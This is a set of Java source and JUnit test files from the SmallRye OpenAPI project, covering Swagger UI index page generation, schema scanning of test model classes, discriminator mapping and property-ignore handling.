assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertTrue(s.contains("url: '/openapi',"));
assertTrue(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
assertTrue(s.contains("filter: 'bla',"));
assertTrue(s.contains("syntaxHighlight: false,"));
}
@Test
void testCreateWithMultipleUrls() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.themeHref, ThemeHref.newspaper.toString());
Map<String, String> urls = new HashMap<>();
urls.put("Default", "/swagger");
urls.put("Production", "/api");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(urls, "Production", options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-newspaper.css\" >"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertFalse(s.contains("url: '/openapi',"));
assertTrue(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
assertTrue(s.contains("urls: [{url: \"/api\", name: \"Production\"},{url: \"/swagger\", name: \"Default\"}],"));
assertTrue(s.contains("\"urls.primaryName\": 'Production',"));
}
@Test
void testCreateWithMultipleUrl() throws IOException {
Map<String, String> urls = new HashMap<>();
urls.put("Default", "/closeapi");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(urls, "Close", null);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"theme-feeling-blue.css\" >"));
assertTrue(s.contains("<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" >"));
assertTrue(s.contains("url: '/closeapi',"));
assertTrue(s.contains("<img src='logo.png' alt='SmallRye OpenAPI UI'"));
assertTrue(s.contains("dom_id: '#swagger-ui',"));
assertTrue(s.contains("deepLinking: true,"));
assertFalse(s.contains("urls.primaryName: 'Close',"));
}
@Test
void testCreateWithInitOAuth() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.oauthClientId, "your-client-id");
options.put(Option.oauthClientSecret, "your-client-secret-if-required");
options.put(Option.oauthRealm, "your-realms");
options.put(Option.oauthAppName, "your-app-name");
options.put(Option.oauthScopeSeparator, " ");
options.put(Option.oauthScopes, "openid profile");
options.put(Option.oauthAdditionalQueryStringParams, "{test: \"hello\"}");
options.put(Option.oauthUsePkceWithAuthorizationCodeGrant, "true");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("clientId: 'your-client-id'"));
assertTrue(s.contains("clientSecret: 'your-client-secret-if-required'"));
assertTrue(s.contains("realm: 'your-realms'"));
assertTrue(s.contains("appName: 'your-app-name'"));
assertTrue(s.contains("scopeSeparator: ' '"));
assertTrue(s.contains("scopes: 'openid profile'"));
assertTrue(s.contains("additionalQueryStringParams: {test: \"hello\"}"));
assertTrue(s.contains("usePkceWithAuthorizationCodeGrant: true"));
}
@Test
void testCreateWithPreauthorizeBasic() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.preauthorizeBasicAuthDefinitionKey, "basicAuth");
options.put(Option.preauthorizeBasicUsername, "username");
options.put(Option.preauthorizeBasicPassword, "password");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("ui.preauthorizeBasic('basicAuth', 'username', 'password');"));
}
@Test
void testCreateWithPreauthorizeApiKey() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.preauthorizeApiKeyAuthDefinitionKey, "api_key");
options.put(Option.preauthorizeApiKeyApiKeyValue, "<KEY>");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("ui.preauthorizeApiKey('api_key', '<KEY>');"));
}
@Test
void testCreateWithPreauthorizeBoth() throws IOException {
Map<Option, String> options = new HashMap<>();
options.put(Option.preauthorizeBasicAuthDefinitionKey, "basicAuth");
options.put(Option.preauthorizeBasicUsername, "username");
options.put(Option.preauthorizeBasicPassword, "password");
options.put(Option.preauthorizeApiKeyAuthDefinitionKey, "api_key");
options.put(Option.preauthorizeApiKeyApiKeyValue, "<KEY>");
byte[] indexHtml = IndexHtmlCreator.createIndexHtml(options);
assertNotNull(indexHtml);
String s = new String(indexHtml);
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("ui.preauthorizeApiKey('api_key', '<KEY>');"));
assertTrue(s.contains("<title>SmallRye OpenAPI UI</title>"));
assertTrue(s.contains("ui.preauthorizeBasic('basicAuth', 'username', 'password');"));
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BaseResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.core.Response;
public abstract class BaseResource<T extends BaseModel> {
protected ResultList<T> getAll1() {
return new ResultList.ResultBuilder<T>().status(200).build();
}
protected Result<T> post1(T t) {
return new Result.ResultBuilder<T>().status(200).build();
}
protected Result<T> put1(T e) {
return new Result.ResultBuilder<T>().status(200).build();
}
protected Response delete1(T t) {
return Response.status(Response.Status.NO_CONTENT).build();
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/XmlTransientField.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.xml.bind.annotation.XmlTransient;
public class XmlTransientField {
@XmlTransient
String prop1Field;
String prop2Field;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ServerError.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class ServerError {
String description;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/UserImpl.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
@Schema
public class UserImpl extends BaseUser implements User {
@Schema(description = "The user identifier", minimum = "15")
public Integer getId() {
return 0;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/XmlTransientField.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.xml.bind.annotation.XmlTransient;
public class XmlTransientField {
@XmlTransient
String prop1Field;
String prop2Field;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ExceptionHandler2.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.NotFoundException;
import javax.ws.rs.core.Response;
import javax.ws.rs.ext.ExceptionMapper;
import javax.ws.rs.ext.Provider;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
@Provider
public class ExceptionHandler2 implements ExceptionMapper<NotFoundException> {
@Override
@APIResponse(responseCode = "404", description = "Not Found")
public Response toResponse(NotFoundException e) {
return null;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/JAXBElementDto.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlElementRef;
import javax.xml.bind.annotation.XmlType;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
@Schema
@XmlAccessorType(value = XmlAccessType.FIELD)
@XmlType(name = "JAXBElementDto", propOrder = { "caseSubtitleFree", "caseSubtitle" })
public class JAXBElementDto {
@XmlElementRef(name = "CaseSubtitle", namespace = "urn:Milo.API.Miljo.DataContracts.V1", type = JAXBElement.class, required = false)
protected JAXBElement<String> caseSubtitle;
@XmlElementRef(name = "CaseSubtitleFree", namespace = "urn:Milo.API.Miljo.DataContracts.V1", type = JAXBElement.class, required = false)
protected JAXBElement<String> caseSubtitleFree;
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/AbstractAnimal.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
/* Test models and resources below. */
@com.fasterxml.jackson.annotation.JsonPropertyOrder(value = { "age", "type" })
public abstract class AbstractAnimal {
@Schema
private String type;
protected Integer age;
private boolean extinct;
@Schema(name = "pet_type", required = true)
public String getType() {
return type;
}
public void setType(String type) {
this.type = type;
}
public int getAge() {
return age;
}
public void setAge(int age) {
this.age = age;
}
@Schema
public Boolean isExtinct() {
return extinct;
}
public void setExtinct(boolean extinct) {
this.extinct = extinct;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/KingCrimson.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.Date;
import javax.json.bind.annotation.JsonbDateFormat;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class KingCrimson extends BaseModel {
public enum Status {
unknown,
success,
failure
}
@JsonbDateFormat(value = "yyyy-MM-dd'T'HH:mm:ss[.SSS]X")
@Schema(implementation = String.class, format = "date-time")
Date timestamp;
Magma environment;
Status status;
public Date getTimestamp() {
return timestamp;
}
public void setTimestamp(Date timestamp) {
this.timestamp = timestamp;
}
public Magma getEnvironment() {
return environment;
}
public void setEnvironment(Magma environment) {
this.environment = environment;
}
public Status getStatus() {
return status;
}
public void setStatus(Status status) {
this.status = status;
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/DiscriminatorMappingTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class DiscriminatorMappingTests extends IndexScannerTestBase {
@Test
void testJavaxDiscriminatorFullDeclaredInResponse() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorFullDeclaredInResponseTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorFullDeclaredInResponse() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorFullDeclaredInResponseTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorNoMappingTestResource() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorNoMappingTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorNoMappingTestResource() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorNoMappingTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorMappingNoSchema() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping-schema.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorMappingNoSchemaTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorMappingNoSchema() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping-schema.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorMappingNoSchemaTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorMappingNoKey() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping-key.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorMappingNoKeyTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorMappingNoKey() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-mapping-key.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorMappingNoKeyTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorMappingEmptyMapping() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-empty-mapping.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorMappingEmptyMappingTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorMappingEmptyMapping() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-empty-mapping.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorMappingEmptyMappingTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
@Test
void testJavaxDiscriminatorMappingNoPropertyName() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-property-name.json",
test.io.smallrye.openapi.runtime.scanner.DiscriminatorMappingNoPropertyNameTestResource.class,
test.io.smallrye.openapi.runtime.scanner.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.Canine.class,
test.io.smallrye.openapi.runtime.scanner.Cat.class,
test.io.smallrye.openapi.runtime.scanner.Dog.class,
test.io.smallrye.openapi.runtime.scanner.Lizard.class);
}
@Test
void testJakartaDiscriminatorMappingNoPropertyName() throws IOException, JSONException {
assertJsonEquals("polymorphism.declared-discriminator-no-property-name.json",
test.io.smallrye.openapi.runtime.scanner.jakarta.DiscriminatorMappingNoPropertyNameTestResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.AbstractPet.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Canine.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Cat.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Dog.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Lizard.class);
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/JacksonPropertyOrderCustomName.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
@com.fasterxml.jackson.annotation.JsonPropertyOrder(value = { "theName", "comment2ActuallyFirst", "comment" })
public class JacksonPropertyOrderCustomName {
@com.fasterxml.jackson.annotation.JsonProperty(value = "theName")
String name;
String name2;
String comment;
@com.fasterxml.jackson.annotation.JsonProperty(value = "comment2ActuallyFirst")
String comment2;
public String getComment() {
return comment;
}
public String getName() {
return name;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/models/examples/ExampleImpl.java<|end_filename|>
package io.smallrye.openapi.api.models.examples;
import org.eclipse.microprofile.openapi.models.examples.Example;
import io.smallrye.openapi.api.constants.OpenApiConstants;
import io.smallrye.openapi.api.models.ExtensibleImpl;
import io.smallrye.openapi.api.models.ModelImpl;
/**
* An implementation of the {@link Example} OpenAPI model interface.
*/
public class ExampleImpl extends ExtensibleImpl<Example> implements Example, ModelImpl {
private String ref;
private String summary;
private String description;
private Object value;
private String externalValue;
/**
* @see org.eclipse.microprofile.openapi.models.Reference#getRef()
*/
@Override
public String getRef() {
return this.ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.Reference#setRef(java.lang.String)
*/
@Override
public void setRef(String ref) {
if (ref != null && !ref.contains("/")) {
ref = OpenApiConstants.REF_PREFIX_EXAMPLE + ref;
}
this.ref = ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#getSummary()
*/
@Override
public String getSummary() {
return this.summary;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#setSummary(java.lang.String)
*/
@Override
public void setSummary(String summary) {
this.summary = summary;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#getDescription()
*/
@Override
public String getDescription() {
return this.description;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#setDescription(java.lang.String)
*/
@Override
public void setDescription(String description) {
this.description = description;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#getValue()
*/
@Override
public Object getValue() {
return this.value;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#setValue(java.lang.Object)
*/
@Override
public void setValue(Object value) {
this.value = value;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#getExternalValue()
*/
@Override
public String getExternalValue() {
return this.externalValue;
}
/**
* @see org.eclipse.microprofile.openapi.models.examples.Example#setExternalValue(java.lang.String)
*/
@Override
public void setExternalValue(String externalValue) {
this.externalValue = externalValue;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/scanner/spi/ScannerSPILogging.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner.spi;
import org.jboss.logging.Logger;
import org.jboss.logging.annotations.LogMessage;
import org.jboss.logging.annotations.Message;
import org.jboss.logging.annotations.MessageLogger;
@MessageLogger(projectCode = "SROAP", length = 5)
interface ScannerSPILogging { // NOSONAR (use of constants in an interface)
ScannerSPILogging log = Logger.getMessageLogger(ScannerSPILogging.class, ScannerSPILogging.class.getPackage().getName());
@LogMessage(level = Logger.Level.WARN)
@Message(id = 7900, value = "Value '%s' is not a valid %s default")
void invalidDefault(String segment, String primitive);
@LogMessage(level = Logger.Level.WARN)
@Message(id = 7901, value = "Matrix parameter references missing path segment: %s")
void missingPathSegment(String segment);
}
<|start_filename|>ui/open-api-ui/src/main/java/io/smallrye/openapi/ui/HttpMethod.java<|end_filename|>
package io.smallrye.openapi.ui;
/**
* List of HTTP methods that have the "Try it out" feature enabled. An empty array disables "Try it out" for all operations.
* This does not filter the operations from the display.
*
* @author <NAME> (<EMAIL>)
*/
public enum HttpMethod {
get,
put,
post,
delete,
options,
head,
patch,
trace
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ExtensionParsingTestResource1.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.callbacks.Callback;
import org.eclipse.microprofile.openapi.annotations.callbacks.CallbackOperation;
import org.eclipse.microprofile.openapi.annotations.callbacks.Callbacks;
import org.eclipse.microprofile.openapi.annotations.enums.SchemaType;
import org.eclipse.microprofile.openapi.annotations.extensions.Extension;
import org.eclipse.microprofile.openapi.annotations.media.Content;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
/* Test models and resources below. */
@Path(value = "/ext-custom")
public class ExtensionParsingTestResource1 {
@POST
@Consumes(value = MediaType.TEXT_PLAIN)
@Produces(value = MediaType.TEXT_PLAIN)
@Callbacks(value = {
@Callback(name = "extendedCallback", callbackUrlExpression = "http://localhost:8080/resources/ext-callback", operations = @CallbackOperation(summary = "Get results", extensions = {
@Extension(name = "x-object", value = "{ \"key\":\"value\" }", parseValue = true),
@Extension(name = "x-object-unparsed", value = "{ \"key\":\"value\" }"),
@Extension(name = "x-array", value = "[ \"val1\",\"val2\" ]", parseValue = true),
@Extension(name = "x-booltrue", value = "true", parseValue = false) }, method = "get", responses = @APIResponse(responseCode = "200", description = "successful operation", content = @Content(mediaType = "application/json", schema = @Schema(type = SchemaType.ARRAY, implementation = String.class))))) })
public String get(String data) {
return data;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Residents.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
public class Residents extends BaseModel {
String foo;
String bar;
public String getFoo() {
return foo;
}
public void setFoo(String foo) {
this.foo = foo;
}
public String getBar() {
return bar;
}
public void setBar(String bar) {
this.bar = bar;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/MultipartFormVerify.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.FormParam;
public class MultipartFormVerify {
@FormParam(value = "token")
public String token;
@FormParam(value = "os")
public String os;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/RequestBodyWidget.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class RequestBodyWidget {
long id;
String name;
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/IgnoreTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.jboss.jandex.ClassType;
import org.jboss.jandex.DotName;
import org.jboss.jandex.FieldInfo;
import org.jboss.jandex.Type;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import test.io.smallrye.openapi.runtime.scanner.entities.IgnoreSchemaOnFieldExample;
import test.io.smallrye.openapi.runtime.scanner.entities.IgnoreTestContainer;
import test.io.smallrye.openapi.runtime.scanner.entities.JsonIgnoreOnFieldExample;
import test.io.smallrye.openapi.runtime.scanner.entities.JsonIgnoreTypeExample;
import test.io.smallrye.openapi.runtime.scanner.entities.TransientFieldExample;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class IgnoreTests extends JaxRsDataObjectScannerTestBase {
// Always ignore nominated properties when given class is used.
@Test
void testIgnore_jsonIgnorePropertiesOnClass() throws IOException, JSONException {
String name = IgnoreTestContainer.class.getName();
Type type = getFieldFromKlazz(name, "jipOnClassTest").type();
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, type);
Schema result = scanner.process();
printToConsole(name, result);
assertJsonEquals(name, "ignore.jsonIgnorePropertiesOnClass.expected.json", result);
}
// Ignore nominated properties of the field in this instance only.
@Test
void testIgnore_jsonIgnorePropertiesOnField() throws IOException, JSONException {
String name = IgnoreTestContainer.class.getName();
FieldInfo fieldInfo = getFieldFromKlazz(name, "jipOnFieldTest");
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, fieldInfo, fieldInfo.type());
Schema result = scanner.process();
printToConsole(name, result);
assertJsonEquals(name, "ignore.jsonIgnorePropertiesOnField.expected.json", result);
}
// Entirely ignore a single field once.
@Test
void testIgnore_jsonIgnoreField() throws IOException, JSONException {
DotName name = DotName.createSimple(JsonIgnoreOnFieldExample.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), "ignore.jsonIgnoreField.expected.json", result);
}
// Entirely ignore a single field once.
@Test
void testIgnore_jsonIgnoreType() throws IOException, JSONException {
DotName name = DotName.createSimple(JsonIgnoreTypeExample.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), "ignore.jsonIgnoreType.expected.json", result);
}
// Entirely ignore a single field once using JSON-B.
@Test
void testJavaxIgnore_jsonbTransientField() throws IOException, JSONException {
DotName name = DotName
.createSimple(test.io.smallrye.openapi.runtime.scanner.entities.JsonbTransientOnFieldExample.class.getName());
testIgnore_jsonbTransientField(name, "ignore.jsonbTransientField.expected.json");
}
@Test
void testJakartaIgnore_jsonbTransientField() throws IOException, JSONException {
DotName name = DotName.createSimple(
test.io.smallrye.openapi.runtime.scanner.entities.jakarta.JsonbTransientOnFieldExample.class.getName());
testIgnore_jsonbTransientField(name, "ignore.jakartaJsonbTransientField.expected.json");
}
void testIgnore_jsonbTransientField(DotName name, String expected) throws IOException, JSONException {
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), expected, result);
}
// Entirely ignore a single field once using hidden attribute of Schema.
@Test
void testIgnore_schemaHiddenField() throws IOException, JSONException {
DotName name = DotName.createSimple(IgnoreSchemaOnFieldExample.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), "ignore.schemaHiddenField.expected.json", result);
}
@Test
void testIgnore_transientField() throws IOException, JSONException {
DotName name = DotName.createSimple(TransientFieldExample.class.getName());
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context,
ClassType.create(name, Type.Kind.CLASS));
Schema result = scanner.process();
printToConsole(name.local(), result);
assertJsonEquals(name.local(), "ignore.transientField.expected.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/entities/jakarta/JaxbWithNameGreeting.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.entities.jakarta;
import java.util.List;
import jakarta.xml.bind.annotation.XmlAttribute;
import jakarta.xml.bind.annotation.XmlElement;
import jakarta.xml.bind.annotation.XmlElementWrapper;
import jakarta.xml.bind.annotation.XmlRootElement;
@XmlRootElement(name = "MyGreeting")
public class JaxbWithNameGreeting {
@XmlAttribute
private final String message;
public JaxbWithNameGreeting(String message, String title, List<String> items) {
this.message = message;
this.title = title;
this.books = items;
}
public String getMessage() {
return message;
}
@XmlElementWrapper(name = "books-array")
@XmlElement(name = "item")
private final List<String> books;
public List<String> getBooks() {
return books;
}
@XmlElement(name = "xml-title")
private String title;
public String getTitle() {
return title;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResteasyMultipartFormDataInputTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.core.MediaType;
import org.jboss.resteasy.plugins.providers.multipart.MultipartFormDataInput;
@Path(value = "multipart-form-data-input")
public class ResteasyMultipartFormDataInputTestResource {
@POST
@Path(value = "post")
@Consumes(value = MediaType.MULTIPART_FORM_DATA)
@SuppressWarnings(value = "unused")
public void post(MultipartFormDataInput input) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/MultipartFormUploadIconForm.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.FormParam;
public class MultipartFormUploadIconForm extends MultipartFormVerify {
@FormParam(value = "icon")
public byte[] icon;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/BaseUser.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.validation.constraints.Min;
import jakarta.validation.constraints.NotNull;
public abstract class BaseUser {
@Min(value = 10)
@NotNull
protected Integer id;
}
